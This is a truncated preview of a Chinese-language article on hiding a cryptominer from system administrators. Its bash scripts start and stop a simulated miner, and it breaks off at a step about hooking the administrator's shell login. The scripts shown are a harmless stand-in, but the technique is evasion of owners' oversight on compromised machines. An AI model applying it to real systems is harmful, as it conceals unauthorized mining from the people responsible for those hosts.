后门对抗技术，与管理员躲猫猫，敌进我退，敌退我进

文章预览

在介绍原理之前，先来看一下实战效果，模拟挖矿程序在系统运行，当管理员登入后，停止运行，管理员退出时启动挖矿脚本，说干就干。 1. 模拟挖矿程序 建一个名为  miner.sh  的脚本，模拟一个挖矿程序 #!/bin/bash # 模拟一个长时间运行的挖矿程序 while true ; do echo "Mining..." sleep 5 done 添加执行权限 chmod +x miner.sh 2. 编写停止挖矿脚本 我们可以直接写入到配置文件中，但是为了演示清晰，还是单独弄一个脚本 stop_miner.sh #!/bin/bash # 获取 miner.sh 的 PID 并终止它 PID=$(pgrep -f miner.sh) if [ -n " $PID " ]; then echo "Stopping miner.sh (PID: $PID )" kill $PID else echo "miner.sh is not running" fi 添加执行权限 chmod +x stop_miner.sh 3. 编写开启挖矿的脚本 start_miner.sh #!/bin/bash # 启动 miner.sh echo "Starting miner.sh" ./miner.sh & 添加执行权限 chmod +x start_miner.sh 4. 修改管理员的 Shel ………………………………